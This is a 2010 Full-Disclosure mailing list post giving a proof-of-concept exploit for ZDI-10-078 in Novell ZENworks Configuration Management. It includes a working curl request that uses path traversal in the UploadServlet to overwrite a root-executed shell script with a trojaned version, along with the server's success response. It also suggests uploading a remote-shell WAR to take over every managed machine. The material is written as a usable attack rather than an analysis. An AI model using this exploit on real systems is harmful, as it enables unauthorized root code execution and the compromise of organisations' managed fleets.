lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 26 Apr 2010 18:40:43 -0700 (PDT)
From: tu canal amigo <tucanalamigo@...oo.com>
To: tucanalamigo@...oo.com
Subject: PoC for ZDI-10-078

# Exploit Title: ZDI-10-078: NovellZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


You can overwrite any file owned by zenworks user (nearly all /opt/novell)
such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script
executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root...

$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
    echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
    exit 1
fi

if [ -z "$SLEEPTIME" ]; then
    SLEEPTIME=10
fi

while [ 1 ]; do
    sleep $SLEEPTIME
    for SRV in $SERVICES; do
         /etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
        ( date ; id ) >> /tmp/monitor.log 2>&1
    done
done
$


You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.


PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):

$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
*   Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT

<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$


-- 
Saludosde #linux, tu canal amigo.



      

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ